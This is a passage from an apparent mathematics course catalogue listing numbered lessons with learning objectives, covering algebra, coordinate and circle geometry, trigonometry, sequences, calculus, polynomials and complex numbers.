Algebra- formulae Changing the subject of the formula.\nObjective: On completion of the lesson the student will be able to move pronumerals around an equation using all the rules and operations covered previously.\n13 Algebra-inequalities Solving Inequalities.\nObjective: On completion of the lesson the student will understand the ‘greater than’ and ‘less than’ signs, and be able to perform simple inequalities.\n14 Algebra-factorising Simplifying easy algebraic fractions.\nObjective: On completion of the lesson the student will understand how to simplify algebraic fractions by factorising.\n15 Algebraic fractions Simplifying algebraic fractions using the index laws.\nObjective: On completion of the lesson the student will be able to simplify most algebraic fractions using different methodologies.\n16 Algebra-negative indices Algebraic fractions resulting in negative indices.\nObjective: On completion of the lesson the student will be able to understand how to simplify an algebraic fractional expression with a negative index, and also how to write such an expression without a negative index.\n17 Factorisation Factorisation of algebraic fractions including binomials.\nObjective: On completion of the lesson the student should be able to simplify more complex algebraic fractions using a variety of methods.\n18 Algebraic fractions-binomial Cancelling binomial factors in algebraic fractions.\nObjective: On completion of the lesson the student should be able to factorise binomials to simplify fractions.\n19 Absolute value or modulus Simplifying absolute values\nObjective: On completion of the lesson the student will be able to simplify expressions involving absolute values or the modulus of real numbers.\n20 Absolute value or modulus Solving for the variable\nObjective: On completion of the lesson the student will be able to solve equations involving a single absolute value.\n21 Absolute value or modulus Solving and graphing inequalities\nObjective: On completion of the lesson the student will be able to solve inequalities involving one absolute value.\n22 Simultaneous equns Simultaneous equations\nObjective: On completion of the lesson the student will be able to solve 2 equations with 2 unknown variables by the substitution method.\n23 Simultaneous equns Elimination method\nObjective: On completion of the lesson the student will be able to solve 2 equations with 2 unknown variables by the elimination method.\n24 Simultaneous equns Elimination method part 2\nObjective: On completion of the lesson the student will be able to solve all types of simultaneous equations with 2 unknown variables by the elimination method.\n25 Simultaneous equns Applications of simultaneous equations\nObjective: On completion of this lesson the student will be able to derive simultaneous equations from a given problem and then solve those simultaneous equations.\n26 Geometry-circles The equation of a circle: to find radii of circles\nObjective: On completion of the lesson the student will be able to describe a circle mathematically given its equation or its graph. Additionally, the student will be able to work out the equation of a circle given its centre and radius.\n27 Geometry-circles The semicircle: to select the equation given the semi circle and vice versa\nObjective: On completion of the lesson the student will be able to sketch a semicircle given its equation and derive the equation of a given semicircle.\n28 Geometry-parabola The parabola: to describe properties of a parabola from its equation\nObjective: On completion of the lesson the student will be able to predict the general shape and important features of a parabola and then graph the parabola to check the predictions.\n29 Functions and graphs Quadratic polynomials of the form y = ax. + bx + c.\nObjective: On completion of the lesson the student will be able to predict the general shape of a parabola and verify the predictions by sketching the parabola. The student will also be introduced to the discriminant and the axis.\n30 Functions and graphs Graphing perfect squares: y=(a-x) squared\nObjective: On completion of the lesson the student will be able to analyse a curve and then check their work by graphing the curve.\n31 Graphing roots Graphing irrational roots\nObjective: On completion of the lesson the student will be able to solve any polynomial which has real roots, whether they are rational or irrational.\n32 Coordinate geometry Solve by graphing\nObjective: On completion of the lesson students will use the slope intercept form of a line to create graphs and find points of intersection.\n33 Graphing-polynomials Graphing complex polynomials: quadratics with no real roots\nObjective: On completion of the lesson the student will be able to determine whether a quadratic has real or complex roots and then graph it.\n34 Graphing-polynomials General equation of a circle: determine and graph the equation\nObjective: On completion of the lesson the student will be able to solve these types of problems. Working with circles will also help the student in the topic of circle geometry, which tests the student’s skills in logic and reasoning.\n35 Graphing-cubic curves Graphing cubic curves\nObjective: On completion of this lesson the student will be able to graph a cubic given its equation or derive the equation of a cubic given its graph or other relevant information.\n36 Absolute value equations Absolute value equations\nObjective: On completion of this lesson the student will be able to relate to graphs involving the absolute value function. The student will be capable of graphing the function given its equation and be able to solve for the intersection of an absolute value functio\n37 Rect.hyperbola The rectangular hyperbola.\nObjective: On completion of the lesson the student will be able to analyse and graph a rectangular hyperbola and describe its important features.\n38 Exponential function The exponential function.\nObjective: On completion of the lesson the student will be able to graph any equation in the form y equals a to the power x, where a is any positive real number apart from 1.\n39 Log functions Logarithmic functions.\nObjective: On completion of this lesson the student will be able to define basic logarithmic functions and describe the relationship between logarithms and exponents including graph logarithmic functions. The student will understand the relationship between logarit\n40 Circle Geometry Theorem – Equal arcs on circles of equal radii subtend equal angles at the centre. Theorem – Equal angles at the centre of a circle on equal arcs.\nObjective: On completion of the lesson the student will be able to prove that ‘Equal arcs on circles of equal radii, subtend equal angles at the centre’, and that ‘Equal angles at the centre of a circle stand on equal arcs.’ They should then be able to use these pro\n41 Circle Geometry Theorem – The perpendicular from the centre of a circle to a chord bisects the chord. Theorem – The line from the centre of a circle to the mid-point of the chord is perpendicular to the chord.\nObjective: On completion of the lesson the student will be able to prove that ‘The perpendicular from the centre of a circle to a chord bisects the chord.’ and its converse theorem ‘The line from the centre of a circle to the mid-point of the chord is perpendicular’\n42 Circle Geometry Theorem – Equal chords in equal circles are equidistant from the centres. Theorem – Chords in a circle which are equidistant from the centre are equal.\nObjective: On completion of the lesson the student will be able to prove that equal chords in equal circles are equidistant from the centre.\n43 Circle Geometry Theorem – The angle at the centre of a circle is double the angle at the circumference standing on the same arc.\nObjective: On completion of the lesson the student will be able to prove that the angle at the centre of a circle is double the angle at the circumference standing on the same arc.\n44 Circle Geometry Theorem – Angles in the same segment of a circle are equal.\nObjective: On completion of the lesson the student will be able to prove that the angles in the same segment are equal.\n45 Circle Geometry Theorem – The angle of a semi-circle is a right angle.\nObjective: On completion of the lesson the student will be able to prove that ‘The angle of a semi-circle is a right-angle.’\n46 Circle Geometry Theorem – The opposite angles of a cyclic quadrilateral are supplementary.\nObjective: On completion of the lesson the student will be able to prove that the opposite angles of a cyclic quadrilateral are supplementary.\n47 Circle Geometry Theorem – The exterior angle at a vertex of a cyclic quadrilateral equals the interior opposite angle.\nObjective: On completion of the lesson the student will be able to prove that the exterior angle at a vertex of a cyclic quadrilateral equals the interior opposite.\n48 Circle Geometry Theorem – The tangent to a circle is perpendicular to the radius drawn to it at the point of contact.\nObjective: On completion of the lesson the student will be able to prove that the tangent and the radius of a circle are perpendicular at the point of contact.\n49 Circle Geometry Theorem – Tangents to a circle from an external point are equal.\nObjective: On completion of the lesson the student will be able to prove that tangents to a circle from an external point are equal.\n50 Circle Geometry Theorem – The angle between a tangent and a chord through the point of contact is equal to the angle in the alternate segment.\nObjective: On completion of the lesson the student will be able to prove that the angle between a tangent and a chord through the point of contact is equal to the angle in the alternate segment.\n51 Co-ordinate Geometry-Two point formula Two point formula: equation of a line which joins a pair of points.\nObjective: On completion of the lesson the student will be able to calculate the equation of a line given any two named points on the line.\n52 Co-ordinate Geometry-Intercept form Intercept form of a straight line: find the equation when given x and y\nObjective: On completion of the lesson the student will have an effective and efficient method for calculating the equation of a straight line.\n53 Co-ordinate Geometry-Parallel lines\nequations\nParallel lines: identify equation of a line parallel to another\nObjective: On completion of the lesson the student will be able to decide if two or more lines are parallel or not and to solve problems involving parallel lines.\n54 Co-ordinate Geometry-Perpendicular lines Perpendicular lines.\nObjective: On completion of the lesson the student will be able to derive the equation of a line, given that it is perpendicular to another stated line.\n55 Co-ordinate Geometry-Inequalities Inequalities on the number plane.\nObjective: On completion of the lesson the student will be able to derive the expression for an inequality given its graph. The student will also be able to solve some problems using inequalities.\n56 Co-ordinate Geometry-Theorems Perpendicular distance\nObjective: On completion of the lesson the student will be able to derive the formula to calculate the distance between a given point and a given line. The student will also be able to calculate the distance between parallel lines.\n57 Co-ordinate Geometry-Theorems Line through intersection of two given lines\nObjective: On completion of the lesson the student will be able to calculate the equation of a line which goes through the intersection of two given lines and also through another named point or satisfies some other specified condition.\n58 Co-ordinate Geometry-Theorems Angles between two lines\nObjective: On completion of the lesson the student will be able to calculate the angle between given lines and derive the equation of a line given its angle to another line.\n59 Co-ordinate Geometry-Theorems Internal and external division of an interval\nObjective: On completion of the lesson the student will be able to divide an interval according to a given ratio and to calculate what point divides an interval in a given ratio for both internal and external divisions.\n60 Statistics – Standard deviation Standard deviation applications\nObjective: On completion of the lesson the student will be able to use standard deviation as a measure of deviation from a mean.\n61 Statistics – Standard deviation Normal distribution\nObjective: On completion of the lesson the student will be able to use the standard deviation of a normal distribution to find the percentage of scores within ranges.\n62 Statistics – Interquartile range Measures of spread: the interquartile range\nObjective: On completion of the lesson the student will be able to find the upper and lower quartiles and the interquartile range\n63 Statistics Stem and Leaf Plots along with Box and Whisker Plots\nObjective: On completion of the lesson the student will be familiar with vocabulary for statistics including quartiles, mode, median, range and the representation of this information on a Box and Whisker Plot.\n64 Statistics Scatter Diagrams\nObjective: On completion of the lesson the student will be able to construct scatter plots and draw conclusions from these.\n65 Trigonometry-exact ratios Trigonometric ratios of 30., 45. and 60. – exact ratios.\nObjective: On completion of the lesson the student will be able to find the exact sine, cosine and tangent ratios for the angles 30., 45.and 60.\n66 Trigonometry-cosine rule The cosine rule to find an unknown side. [Case 1 SAS].\nObjective: On completion of the lesson the student will be able to use the cosine rule to find the length of an unknown side of a triangle knowing 2 sides and the included angle.\n67 Trigonometry-cosine rule The cosine rule to find an unknown angle. [Case 2 SSS].\nObjective: On completion of the lesson the student will be able to find the size of an unknown angle of a triangle using the cosine rule given the lengths of the 3 sides.\n68 Trigonometry-sine rule The sine rule to find an unknown side. Case 1.\nObjective: On completion of the lesson the student will be able to use the Sine rule to find the length of a particular side when the student is given the sizes of 2 of the angles and one of the sides.\n69 Trigonometry-sine rule The sine rule to find an unknown angle. Case 2.\nObjective: On completion of the lesson the student will be able to use the sine rule to find an unknown angle when given 2 sides and a non-included angle.\n70 Trigonometry-areas The area formula\nObjective: On completion of the lesson the student will be able to use the sine formula for finding the area of a triangle given 2 sides and the included angle.\n71 Graphing binomials Binomial products.\nObjective: On completion of the lesson the student will understand the term binomial product and be capable of expanding and simplifying an expression.\n72 Graphing binomials Binomial products with negative multiplier\nObjective: On completion of the lesson the student will understand specific terms and be prepared to expand and simplify different monic binomial products.\n73 Graphing binomials Binomial products [non-monic].\nObjective: On completion of the lesson, the student will have examined more complex examples with binomial products.\n74 Squaring binomial Squaring a binomial. [monic]\nObjective: On completion of the lesson the student should understand the simple one-step process of squaring a monic binomial.\n75 Squaring binomial Squaring a binomial [non-monic].\nObjective: On completion of the lesson the student will apply the same rule that is used with monic binomials.\n76 Factorising Expansions leading to the difference of two squares\nObjective: On completion of the lesson the student will understand expansions leading to differences of 2 squares.\n77 Algebraic expressions-products Products in simplification of algebraic expressions\nObjective: On completion of the lesson the student will understand simplification of algebraic expressions in step-by-step processing.\n78 Algebraic expressions-larger expansions Algebraic Expressions – Larger expansions.\nObjective: On completion of the lesson the student will be capable of expanding larger algebraic expressions.\n79 Algebra-highest common factor Highest common factor.\nObjective: On completion of the lesson the student will be capable of turning a simple algebraic expression into the product of a factor in parentheses and identifying the highest common factors of the whole expression.\n80 Factors by grouping Factors by grouping.\nObjective: On completion of the lesson the student will be able to complete the process given just two factors for the whole expression.\n81 Difference of 2 squares Difference of two squares\nObjective: On completion of the lesson the student understand the difference of two squares and be capable of recognising the factors.\n82 Common fact and diff Common factor and the difference of two squares\nObjective: On completion of the lesson the student will be aware of common factors and recognise the difference of two squares.\nObjective: On completion of the lesson the student will understand the factorisation of quadratic trinomial equations with all terms positive.\nObjective: On completion of the lesson the student will accurately identify the process if the middle term of a quadratic trinomial is negative.\nObjective: On completion of the lesson the student will have an increased knowledge on factorising quadratic trinomials and will understand where the 2nd term is positive and the 3rd term is negative.\nObjective: On completion of the lesson the student will understand how to factorise all of the possible types of monic quadratic trinomials and specifcally where the 2nd term and 3rd terms are negative.\nObjective: On completion of the lesson the student will be capable of factorising any quadratic trinomial.\nObjective: On completion of the lesson the student know two methods for factorisation of quadratic trinomials including the cross method.\n89 Sum/diff 2 cubes Sum and difference of two cubes.\nObjective: On completion of the lesson the student will be cognisant of the sum and difference of 2 cubes and be capable of factorising them.\n90 Algebraic fractions Simplifying algebraic fractions.\nObjective: On completion of the lesson the student should be familiar with all of the factorisation methods presented to this point.\n91 Logic Inductive and deductive reasoning\nObjective: On completion of this lesson the student will understand and use the terms hypothesis, conclusion, inductive and deductive.\n92 Logic Definition and use of counter examples\nObjective: On completion of this lesson the student will be able to create counter examples to statements.\n93 Logic Indirect proofs\nObjective: On completion of the lesson the student will be able to use indirect proofs by assuming the opposite of the statement being proved.\n94 Logic Mathematical induction\nObjective: On completion of the lesson the student will be able to perform the process of mathematical induction for simple series.\n95 Quadratic equations Completing the square\nObjective: On completion of the lesson the student will understand the process of completing the square.\nObjective: On completion of the lesson the student will understand the reasoning behind completing the square.\nObjective: On completion of the lesson the student will be familiar with the quadratic formula.\nObjective: On completion of the lesson the student will be able to express a problem as a quadratic equation and then solve it.\nObjective: On completion of the lesson the student will better understand why quadratic equations have two solutions and will be capable of solving quadratic equations and problems graphically..\n100 Coordinate Geometry-the plane Distance formula.\nObjective: On completion of the lesson the student will be able to calculate the distance between any two points on the number plane and interpret the results.\n101 Coordinate Geometry-midpoint, slope Mid-point formula\nObjective: On completion of the lesson the student will be able to understand the mid point formula and use it practically.\nObjective: On completion of the lesson the student will be able to calculate the gradient of a line given its inclination, or angle to the positive direction of the x-axis; or its rise and run.\nObjective: On completion of the lesson the student will be able to calculate the gradient of a line given any two points on the line and also be capable of checking whether 3 or more points lie on the same line and what an unknown point will make to parallel lines.\n104 Coordinate Geometry-straight line The straight line.\nObjective: On completion of the lesson the student will be able to draw a line which is parallel to either axis and comment on its gradient, where that gradient exists.\n105 Coordinate Geometry-slope, etc. Lines through the origin.\nObjective: On completion of the lesson the student will be able to draw a line which passes through the origin of the form y=mx and comment on its gradient compared to the gradients of other lines through the origin and use the information to solve problems.\n106 Coordinate Geometry-equation of line General form of a line and the x and y Intercepts.\nObjective: On completion of the lesson the student will be able to change the equation of a straight line from the form, written as y=mx+c, into the general form and vice versa.\n107 Coordinate Geometry-intercept Slope intercept form of a line.\nObjective: On completion of the lesson the student will be able to find the slope and intercept given the equation and given the slope and intercept, derive the equation.\n108 Coordinate Geometry-point slope Point slope form of a line\nObjective: On completion of the lesson the student will understand how to derive the equation of a straight line given the gradient and a point on the line.\n109 Simultaneous equations Number of solutions (Stage 2)\nObjective: On completion of the lesson of the lesson the student will identify simultaneous equations that are consistent, inconsistent or the same.\n110 Vectors 2 vector addition in 2 and 3D (stage 2)\nObjective: On completion of the lesson the student will understand and use component forms for vector resolution.\n111 Linear systems Optimal solutions (Stage 2) – Vectors\nObjective: On completion of the lesson the student will understand the process of linear programming to find optimal solutions.\n112 Linear systems Linear systems with matrices (Stage 2)\nObjective: On completion of the lesson the student will process matrices formed from linear systems of equations.\n113 Linear systems Row-echelon form (Stage 2)\nObjective: On completion of the lesson the student will process matrices formed from linear systems of equations using the row-echelon form.\n114 Linear systems Gauss Jordan elimination method (Stage 2)\nObjective: On completion of the lesson the student will process matrices formed from linear systems of equations using the Gauss Jordan elimination method.\n115 Functions Definition, domain and range\nObjective: On completion of this lesson the student will be able to select functions from relations by referring to the domain and range.\n116 Functions Notation and evaluations\nObjective: On completion of the lesson the student will be understand different notations for functions.\n117 Functions More on domain and range\nObjective: On completion of the lesson the student will be able to describe the domain and range using appropriate set notation.\n118 Functions Domain and range from graphical representations\nObjective: On completion of the lesson the student will be able to describe the domain and range using appropriate set notation from graphical representations.\n119 Functions Evaluating and graphing piecewise functions\nObjective: On completion of the lesson the student will be able to evaluate and graph piecewise functions.\n120 Functions Functions combinations\nObjective: On completion of the lesson the student will be able to perform operations with functions while working with their domains.\n121 Functions Composition of functions\nObjective: On completion of the lesson the student will understand composition of functions or a function of a function.\n122 Functions Inverse functions\nObjective: On completion of the lesson the student will be able to find inverse functions, use the notation correctly and the horizontal line test will be used.\n123 Functions Rational functions Part 1\nObjective: On completion of the lesson the student will be able to work with the division of functions and to interpret this on the coordinate number plane showing vertical and horizontal asymptotes.\n124 Functions Rational functions Part 2\nObjective: On completion of the lesson the student will be able to use the degree of polynomials and polynomial division to assist in graphing rational functions on the coordinate number plane showing vertical, horizontal and slant asymptotes.\n125 Trig-reciprocal ratios Reciprocal ratios.\nObjective: On completion of the lesson the student will be able to identify and use the reciprocal trigonometric ratios of sine, cosine and tan, that is, the cosecant, secant and cotangent ratios.\n126 Trig complementary angles Complementary angle results.\nObjective: On completion of the lesson the student will understand how to establish the complementary angle results for the sine and cosine ratios and then how to use these results to solve trig equations.\n127 Trig identities Trigonometric identities\nObjective: On completion of the lesson the student will be able to simplify trigonometrical expressions and solve trigonometry equations using the knowledge of trig identities.\n128 Trig larger angles Angles of any magnitude\nObjective: On completion of the lesson the student will be able to find the trigonometric values of angles of any magnitude by assigning angles to the four quadrants of the circle.\n129 Trig larger angles Trigonometric ratios of 0°, 90°, 180°, 270° and 360°\nObjective: On completion of the lesson the student will learn how to find the Trigonometric Ratios of 0, 90, 180, 270 and 360 degrees.\n130 Graph sine Graphing the trigonometric ratios – I Sine curve.\nObjective: On completion of the lesson the student will recognise and draw the sine curve exploring changes in amplitude and period.\n131 Graph cosine Graphing the trigonometric ratios – II Cosine curve.\nObjective: On completion of the lesson the student will know how to recognise and draw the cosine curve exploring changes in amplitude and period.\n132 Graphs tan curve Graphing the trigonometric ratios – III Tangent curve.\nObjective: On completion of the lesson the student will know how to recognise and draw the tan curve.\n133 Graph reciprocals Graphing the trigonometric ratios – IV Reciprocal ratios.\nObjective: On completion of the lesson the student will know how to recognise and draw the curves of the reciprocal ratios: cosec, sec and cot.\n134 Trig larger angles Using one ratio to find another.\nObjective: On completion of the lesson the student will find other trig ratios given one trig ratio and to work with angles of any magnitude.\n135 Trig equations Solving trigonometric equations – Type I.\nObjective: On completion of the lesson the student will solve simple trig equations with restricted domains.\n136 Trig equations Solving trigonometric equations – Type II.\nObjective: On completion of the lesson the student will solve trig equations with multiples of theta and restricted domains.\n137 Trig equations Solving trigonometric equations – Type III.\nObjective: On completion of the lesson the student will solve trig equations with two trig ratios and restricted domains.\n138 Logarithms-Power of 2 Powers of 2.\nObjective: On completion of the lesson the student should be able to convert between logarithmic statements and index statements to the power of 2.\n139 Logarithms-Equations and logs Equations of type log x to the base 3 = 4.\nObjective: On completion of the lesson the student will have an enhanced understanding of the definition of a logarithm and how to use it to find an unknown variable which in this case is the number from which the logarithm evolves.\n140 Logarithms-Equations and logs Equations of type log 32 to the base x = 5.\nObjective: On completion of the lesson the student will have an enhanced understanding of the definition of a logarithm and how to use it to find an unknown variable which in this case is the base from which the number came.\n141 Logarithms-Log laws Laws of logarithms.\nObjective: On completion of the lesson the student will be familiar with 5 logarithm laws.\n142 Logarithms-Log laws expansion Using the log laws to expand logarithmic expressions.\nObjective: On completion of the lesson the student will be able to use the log laws to expand logarithmic expressions.\n143 Logarithms-Log laws simplifying Using the log laws to simplify expressions involving logarithms.\nObjective: On completion of the lesson the student will be able to simplify logarithmic expressions using the log laws.\n144 Logarithms-Log laws numbers Using the log laws to find the logarithms of numbers.\nObjective: On completion of the lesson the student will have an enhanced understanding of the use of the log laws and be able to do more applications with numerical examples.\n145 Logarithms-Equations and logs Equations involving logarithms.\nObjective: On completion of the lesson the student will be able to solve equations with log terms.\n146 Logarithms-Logs to solve equations Using logarithms to solve equations.\nObjective: On completion of the lesson the student will be able to use logarithms to solve index equations with the assistance of a calculator.\n147 Sequences and Series General sequences.\nObjective: On completion of the lesson the student will be able to work out a formula from a given number pattern and then be able to find particular terms of that sequence using the formula.\n148 Sequences and Series Finding Tn given Sn.\nObjective: On completion of the lesson the student will understand the concept that the sum of n terms of a series minus the sum of n minus one terms will yield the nth term.\n149 Arithmetic Progression The arithmetic progression\nObjective: On completion of the lesson the student will be able to test if a given sequence is an Arithmetic Progression or not and be capable of finding a formula for the nth term, find any term in the A.P. and to solve problems involving these concepts.\n150 Arithmetic Progression Finding the position of a term in an A.P.\nObjective: On completion of the lesson the student will be able to solve many problems involving finding terms of an Arithmetic Progression.\n151 Arithmetic Progression Given two terms of A.P., find the sequence.\nObjective: On completion of the lesson the student will be able to find any term of an Arithmetic Progression when given two terms\n152 Arithmetic Progression Arithmetic means\nObjective: On completion of the lesson the student will be able to make an arithmetic progression between two given terms. This could involve finding one, two, or even larger number of arithmetic means.\n153 Arithmetic Progression The sum to n terms of an A.P.\nObjective: On completion of the lesson the student will understand the formulas for the sum of an Arithmetic Progression and how to use them in solving problems.\n154 Geometric Progression The geometric progression.\nObjective: On completion of the lesson the student will be able to test if a given sequence is a Geometric Progression or not and be capable of finding a formula for the nth term, find any term in the G.P. and to solve problems involving these concepts.\n155 Geometric Progression Finding the position of a term in a G.P.\nObjective: On completion of the lesson the student will understand how to find terms in a geometric progression and how to apply it different types of problems.\n156 Geometric Progression Given two terms of G.P., find the sequence.\nObjective: On completion of this lesson the student will be able to solve all problems involving finding the common ratio of a Geometric Progression.\n157 Calculus Limits\nObjective: On completion of the lesson the student will be able to solve problems using limiting sum rule.\n158 Calculus=1st prin Differentiation from first principles.\nObjective: On completion of the lesson the student will be able apply the first principles (calculus) formula to find the gradient of a tangent at any point on a continuous curve.\n159 Calculus=1st prin Differentiation of y = x to the power of n.\nObjective: On completion of the Calculus lesson the student will be able to differentiate a number of expressions involving x raised to the power of n.\n160 Calculus-differential, integ Meaning of dy over dx – equations of tangents and normals.\nObjective: On completion of the Calculus lesson the student will be able to apply differentiation and algebra skills to find the equation of the tangent and the normal to a point on a curve.\n161 Calculus-differential, integ Function of a function rule, product rule, quotient rule.\nObjective: On completion of the Calculus lesson the student will understand how to use the chain rule, the product rule and the quotient rule.\n162 Calculus-differential, integ Increasing, decreasing and stationary functions.\nObjective: On completion of the lesson the student will understand how to find the first derivative of various functions, and use it in various situations to identify increasing, decreasing and stationary functions.\n163 Calculus First Derivative – turning points and curve sketching\nObjective: On completion of the Calculus lesson the student will be able to use the first derivative to find and identify the nature of stationary points on a curve.\n164 Calculus-2nd derivative The second derivative – concavity.\nObjective: On completion of the Calculus lesson the student will be able to find a second derivative, and use it to find the domain over which a curve is concave up or concave down, as well as any points of inflexion.\n165 Sequences and Series-Geometric means Geometric means.\nObjective: On completion of the lesson the student will be able to make a geometric progression between two given terms. This could involve finding one, two, or even larger number of geometric means.\n166 Sequences and Series-Sum of gp The sum to n terms of a G.P.\nObjective: On completion of the lesson the student will understand the formulas and how to use them to solve problems in summing terms of a Geometric Progression (G.P).\n167 Sequences and Series-Sigma notation Sigma notation\nObjective: On completion of the G.P. lesson the student will be familiar with the sigma notation and how it operates.\n168 Sequences and Series-Sum-infinity Limiting sum or sum to infinity.\nObjective: On completion of the lesson the student will have learnt the formula for the limiting sum of a G.P., the conditions for it to exist and how to apply it to particular problems.\n169 Sequences and Series-Recurring decimal\ninfinity\nRecurring decimals and the infinite G.P.\nObjective: On completion of the G.P. lesson the student will have understood how to convert any recurring decimal to a rational number.\n170 Sequences and Series-Compound interest Compound interest\nObjective: On completion of the G.P. lesson the student will understand the compound interest formula and how to use it and adjust the values of r and n, if required, for different compounding periods.\n171 Sequences and Series-Superannuation Superannuation.\nObjective: On completion of the lesson the student will understand the method of finding the accumulated amount of a superannuation investment using the sum formula for a G.P.\n172 Sequences and Series-Time payments Time payments.\nObjective: On completion of the lesson the student will have examined examples carefully and be capable of setting out the long method of calculating a regular payment for a reducible interest loan.\n173 Sequences and Series Applications of arithmetic sequences\nObjective: On completion of the lesson the student will be capable of problems involving practical situations with arithmetic series.\n174 Calculus – Curve sketching Curve sketching\nObjective: On completion of the Calculus lesson the student will be able to use the first and second derivatives to find turning points of a curve, identify maxima and minima, and concavity, then use this information to sketch a curve.\n175 Calculus – Maxima minima Practical applications of maxima and minima\nObjective: On completion of the lesson the student will be able to apply calculus to a suite of simple maxima or minima problems.\n176 Calculus – Integration Integration – anti-differentiation, primitive function\nObjective: On completion of the Calculus lesson the student will be able to use rules of integration to find primitives of some simple functions.\n177 Calculus – Computation area Computation of an area\nObjective: On completion of the Calculus lesson the student will be able to select an appropriate formula to calculate an area, re-arrange an expression to suit the formula, and use correct limits in the formula to evaluate an area.\n178 Calculus – Computation volumes Computation of volumes of revolution\nObjective: On completion of the Calculus lesson the student will know how to choose an appropriate volume formula, re-arrange an expression to suit the formula, and then calculate a result to a prescribed accuracy.\n179 Calculus – Trapezoidal and Simpson’s rules The Trapezium rule and Simpson’s rule\nObjective: On completion of the Calculus lesson the student will know how to calculate sub-intervals, set up a table of values, then apply the Trapezoidal Rule, or Simpson’s Rule to approximate an area beneath a curve.\n180 Conic sections Introduction to conic sections and their general equation\nObjective: On completion of the lesson the student will identify the conic section from the coefficients of the equation.\n181 Conic sections The parabola x. = 4ay\nObjective: On completion of the lesson the student will identify the focus and directrix for a parabola given in standard form.\n182 Conic sections Circles\nObjective: On completion of the lesson the student will identify the radius of a circle given in standard form.\n183 Conic sections Ellipses\nObjective: On completion of the lesson the student will identify focus, vertices and axes of an ellipse.\n184 Conic sections Hyperbola\nObjective: On completion of the lesson the student will identify focus, vertices, axes and asymptotes of a hyperbola.\n185 Functions Parametric equations (Stage 2)\nObjective: On completion of the lesson the student will be able to eliminate the parameter from a set of equations and identify appropriate restrictions on the domain and range.\n186 Functions Polynomial addition etc in combining and simplifying functions (Stage 2)\nObjective: On completion of the lesson the student will have multiple techniques to understand and construct graphs using algebra.\n187 Functions Parametric functions (Stage 2)\nObjective: On completion of the lesson the student will understand some standard parametric forms using trigonometric identities, appreciate the beauty of the the graphs that can be generated and an application to projectile motion.\n188 Algebra-polynomials Introduction to polynomials\nObjective: On completion of the lesson the student will understand all the terminology associated with polynomials and be able to judge if any algebraic expression is a polynomial or not.\n189 Algebra-polynomials The sum, difference and product of two polynomials.\nObjective: On completion of the lesson the student will be able to add subtract and multiply polynomials and find the degrees of the answers.\n190 Algebra-polynomials Polynomials and long division.\nObjective: On completion of the lesson the student will understand the long division process with polynomials.\n191 Remainder theorem The remainder theorem.\nObjective: On completion of the lesson the student will understand how the remainder theorem works and how it can be applied.\n192 Remainder theorem More on remainder theorem\nObjective: On completion of the lesson the student will understand the remainder theorem and how it can be applied to solve some interesting questions on finding unknown coefficients of polynomials.\n193 Factor theorem The factor theorem\nObjective: On completion of the lesson the student will be able to use the factor theorem and determine if a term in the form of x minus a is a factor of a given polynomial.\n194 Factor theorem More on the factor theorem\nObjective: On completion of the lesson the student will fully understand the factor theorem and how it can be applied to solve some questions on finding unknown coefficients of polynomials.\n195 Factor theorem Complete factorisations using the factor theorem\nObjective: On completion of the lesson the student will be able to factorise polynomials of a higher degree than 2 and to find their zeros.\n196 Polynomial equations Polynomial equations\nObjective: On completion of the lesson the student will be capable of solving polynomial equations given in different forms.\n197 Graphs, polynomials Graphs of polynomials\nObjective: On completion of the lesson the student will understand how to graph polynomials using the zeros of polynomials, the y intercepts and the direction of the curves.\n198 Roots quad equations Sum and product of roots of quadratic equations\nObjective: On completion of the lesson the student will understand the formulas for the sum and product of roots of quadratic polynomials and how to use them. The student will understand how to form a quadratic equation given its roots.\n199 Roots quad equations Sum and product of roots of cubic and quartic equations\nObjective: On completion of the lesson the student will be able to do problems on the sum and products of roots of cubic and quartic equations.\n200 Approx roots Methods of approximating roots\nObjective: On completion of the lesson the student will be capable of finding approximate roots of polynomial equations using half the interval method. The student will be able to make a number of applications of this rule within the one question.\n201 Newton’s approx Newton’s method of approximation\nObjective: On completion of the lesson the student will be able to use Newton’s method in finding approximate roots of polynomial equations and be capable of more than one application of this method.\n202 Statistic-probability Binomial Theorem – Pascal’s Triangle\nObjective: On completion of this lesson the student will use Pascal’s triangle and the binomial theorem to write the expansion of binomial expressions raised to integer powers.\n203 Statistic-probability Binomial probabilities using the Binomial Theorem\nObjective: On completion of the lesson the student will be able to solve certain types of probability questions using the binomial theorem\n204 Statistic-probability Counting techniques and ordered selections – permutations\nObjective: On completion of this lesson the student will be competent in using some new counting techniques used for solving probability.\n205 Statistic-probability Unordered selections – combinations\nObjective: On completion of the lesson the student will be able to use the formula, n c r both with and without a calculator and be able to use it to solve probability problems where unordered selections happen.\n206 Polar coordinates Plotting polar coordinates and converting polar to rectangular\nObjective: On completion of the lesson the student will understand the polar coordinate system and relate this to the rectangular coordinate system.\n207 Polar coordinates Converting rectangular coordinates to polar form\nObjective: On completion of the lesson the student will understand the polar coordinate system and report these from rectangular coordinates.\n208 Polar coordinates Write and graph points in polar form with negative vectors (Stage 2)\nObjective: On completion of the lesson the student will be using negative angles and negative vector lengths.\n209 Trigonometry Sin(A+B) etc sum and difference identities (Stage 2)\nObjective: On completion of the lesson the student will be using the reference triangles for 30, 45 and 60 degrees with the sum and difference of angles to find additional exact values of trigonometric ratios.\n210 Trigonometry Double angle formulas (Stage 2)\nObjective: On completion of the lesson the student will derive and use the double angle trig identities.\n211 Trigonometry Half angle identities (Stage 2)\nObjective: On completion of the lesson the student will derive and use the power reducing formulas and the half angle trig identities.\n212 Trigonometry t Formulas (Stage 2)\nObjective: On completion of the lesson the student will solve trig equations using the t substitution.\n213 Logarithms-Complex numbers Imaginary numbers and standard form\nObjective: On completion of the lesson the student will use the a+bi form of complex numbers for addition and subtraction.\n214 Logarithms-Complex numbers Complex numbers – multiplication and division\nObjective: On completion of the lesson the student will use the a+bi form of complex numbers for multiplication and division.\n215 Logarithms-Complex numbers Plotting complex number and graphical representation\nObjective: On completion of the lesson the student will use the argand diagram to assist in the addition and subtraction of complex numbers.\n216 Logarithms-Complex numbers Absolute value\nObjective: On completion of the lesson the student will use the absolute value or modulus of complex numbers\n217 Logarithms-Complex numbers Trigonometric form of a complex number\nObjective: On completion of the lesson the student will write complex numbers in trigonometric or polar form. This may also be known as mod-ard form.\n218 Logarithms-Complex numbers Multiplication and division of complex numbers in trig form (Stage 2)\nObjective: On completion of the lesson the student will use the trig form of complex numbers for multiplication and division.\n219 Logarithms-Complex numbers DeMoivre’s theorem (Stage 2)\nObjective: On completion of the lesson the student will use DeMoivre’s theorem to find powers of complex numbers in trig form.\n220 Logarithms-Complex numbers The nth root of real and complex numbers (Stage 2)\nObjective: On completion of the 